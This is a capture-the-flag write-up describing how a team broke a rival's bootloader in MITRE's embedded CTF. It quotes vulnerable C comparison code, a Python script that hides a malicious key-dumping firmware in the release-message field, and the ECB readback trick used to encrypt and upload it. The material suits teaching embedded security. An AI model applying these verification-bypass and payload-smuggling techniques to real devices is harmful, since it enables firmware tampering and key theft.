Pwning River Hawk's Bootloader Without DPA or Glitching
Intro
For the past semester I’ve been participating in MITRE’s embedded CTF competition on the Sprite team (we came in second place, but captured the most flags overall). Now that the competition has finished up, I’m going to write up a few of the attacks we came up with.
Design
A protected firmware for River Hawk’s bootloader consists of 5 pieces of information inside a zlib compressed json. The firmware_size
field is a 2 byte unsigned integer representing the uncompressed size of the firmware. The version
field is a 2 byte unsigned integer representing the current version of the firmware. The hex_data
field holds the AES ECB encrypted copy of the given firmware followed by a null byte, the release message, and two more null bytes. The fid
field is the sha1 hash of the contents of the hex_data
field. Finally, the checksum
field is a sha1 hash that takes into account the version, the fid, and the AES key.
Breaking the readback tool
River Hawk’s bootloader implements authenticated readback via an 8 byte password sent over serial. This password is sent in the clear, so we were able to obtain the password from the readback logs. In addition, note that even without the readback logs the it would have still be possible to crack this password because it was vulnerable to a timing attack. The bootloader compared the received password to the correct password one byte at a time:
445 โ if(l == p_length){
446 โ for(int j = 0; j < p_length; j++){
447 โ if(pass[j] != t[j]){
448 โ UART1_putchar(ERROR); // Acknowledge the frame.
449 โ while(1)
450 โ {
451 โ __asm__ __volatile__("");
452 โ }
453 โ }
454 โ }
455 โ }
456 โ else{
457 โ UART1_putchar(ERROR); // Acknowledge the frame.
458 โ while(1)
459 โ {
460 โ __asm__ __volatile__("");
461 โ }
462 โ }
One could crack this password by measuring the amount of time it takes for the bootloader to reject the given password.
Once we obtained the password, we were able to use the readback tool in order to obtain AES ECB mode encrypted data from anywhere in the flash.
Bypassing the firmware verification
River Hawk’s bootloader only validates an uploaded firmware after receiving the whole firmware.
367 โ // Compare digest with fid
368 โ for(int i = 0; i < 20; ++i){
369 โ if(fid[i] != digest[i]){
370 โ UART1_putchar(ERROR); // Reject the firmware update and erase the flash
371 โ while(page != 0){
372 โ page -= SPM_PAGESIZE;
373 โ boot_page_erase_safe(page); // Erase all programed flash memory
374 โ }
375 โ while(1)
376 โ {
377 โ __asm__ __volatile__("");
378 โ }
379 โ }
380 โ }
This means that this code will only be executed after the bootloader exits the while(1) loop in charge of reading the firmware. The only way this happens is if:
357 โ if(frame_length == 0) //If last frame
358 โ break;
The code responsible for sending this frame of length 0 on the python side is:
151 | ser.write(struct.pack('>H', 0x0000))
By removing this line, the watchdog timer will reset the board and it will never verify the uploaded firmware. Note that this alone is not enough to upload a malicious firmware, because the firmware update functionality decrypts the received firmware. This means if one tried to upload a non-encrypted firmware, it would decrypt it and write gibberish to the flash.
Encrypting the malicious firmware
The next step is to encrypt the malicious firmware. We wrote a custom malicious firmware that would read the first 255 bytes of the EEPROM (where the AES key was stored) and dump it out over serial. This firmware was 586 bytes in size.
River Hawk’s bootloader enforces a restriction that the release message is less than 1000 bytes:
47 โ #Check if release message size bigger than 1KB
48 โ if len(msg) > 1000:
49 โ print 'Release message should less than 1kB'
50 โ else:
51 โ pass
Since our malicious firmware is less than 1000 bytes, we can insert our malicious firmware into the release message field of the given protected v3 firmware.
1 โ import json
2 โ import zlib
3 โ import intelhex
4 โ from cStringIO import StringIO
5 โ import hashlib
6 โ import base64
7 โ
8 โ # Open up the protected binary that we have, and load it as json
9 โ with open("v3.bin") as f:
10 โ data = f.read()
11 โ data = zlib.decompress(data)
12 โ data = json.loads(data)
13 โ
14 โ # Parse the intelhex
15 โ intelhexData = data['hex_data']
16 โ firmware = intelhex.IntelHex(StringIO(intelhexData))
17 โ # Get the intelhex as a binary
18 โ binFirmware = firmware.tobinstr()
19 โ print "Unmodified firmware length = {}".format(len(binFirmware))
20 โ # Remove the original release message which was padded on both sides with null bytes
21 โ firmwareWithoutRM = binFirmware[:binFirmware[:-2].rfind('\x00')]
22 โ print "Original RM: {}".format(binFirmware[binFirmware[:-2].rfind('\x00'):-1])
23 โ # Put the firmware without the release message into the intelhex firmware object
24 โ firmware.putsz(0x00, firmwareWithoutRM)
25 โ
26 โ # Read in the evil firmware and put it into the intelhex firmware object
27 โ with open("evil.bin") as f:
28 โ evilBin = f.read()
29 โ print "Putting evilBin of len={} as the rm at index={}".format(len(evilBin), len(firmwareWithoutRM))
30 โ
31 โ
32 โ # Pad with \x11 to make it obvious where the evil firmware is inside the flash
33 โ firmware.putsz(len(firmwareWithoutRM), '\0'+'\x11'*63 + evilBin + '\x11'*63 + '\x00')
34 โ
35 โ
36 โ # Dump the firmware object
37 โ sio = StringIO()
38 โ firmware.write_hex_file(sio)
39 โ hex_data = sio.getvalue()
40 โ
41 โ # Write it out to a file
42 โ with open("v3_evilRM.bin", "w") as f:
43 โ data['hex_data'] = hex_data
44 โ data = json.dumps(data)
45 โ data = zlib.compress(data)
46 โ f.write(data)
We then upload this firmware (bypassing verification checking as described above) and readback an encrypted copy of the firmware (bypassing password auth as described above). In the encrypted readback, we can identify the encrypted bootloader by looking for a sequence of three identical 16 byte chunks (the ‘\x00’+’\x11’*63), 37 unique 16 byte chunks (the malicious firmware), and three more identical 16 byte chunks (the ‘\x11’*63+’\x00’). For example, here is an output of xxd showing part of this pattern:
000003e0: e233 9935 8f4a a611 871c 1766 2599 2efa .3.5.J.....f%...
000003f0: f4ea 87e1 dad2 7077 d139 e243 fb56 bf71 ......pw.9.C.V.q
00000400: f4ea 87e1 dad2 7077 d139 e243 fb56 bf71 ......pw.9.C.V.q
00000410: f4ea 87e1 dad2 7077 d139 e243 fb56 bf71 ......pw.9.C.V.q
00000420: c6b9 8df2 12c9 ab31 611e f52d 64e8 ff8f .......1a..-d...
00000430: ca17 c3f5 5def 49f7 f365 4767 5cc2 7888 ....].I..eGg\.x.
0x3e0 corresponds to the chunk of ‘\x00’+’\x11’*7. 0x3f0, 0x400, and 0x410 correspond to ‘\x11’*48. 0x420 and on correspond to the encrypted malicious firmware. We extracted this data using a simple script:
1 โ from sys import argv
2 โ
3 โ with open(argv[1]) as f:
4 โ data = f.read()
5 โ
6 โ enc = data[eval(argv[2]):eval(argv[3])]
7 โ
8 โ with open('encryptedEvil.bin', 'w') as f:
9 โ f.write(enc)
From there, we modify the given v3 firmware and swap in the encrypted malicious firmware. We upload this (bypassing the firmware verification checking as described above) and it executes thereby dumping the keys over serial.
Grabbing the flags
Once we have the keys, all of the flags are trivial.
-
We grab the rolllback flag by protecting a firmware that resets the version number to 0, then uploading the v1 firmware.
-
We grab the malicious firmware flag by protecting the malicious firmware and uploading it.
-
We grab the IP flag by decrypting the provided v1 firmware.
-
We grab the readback sniffer flag by decrypting the provided readback logs.
-
We grab the memory read flag by decrypting a previously taken encrypted readback.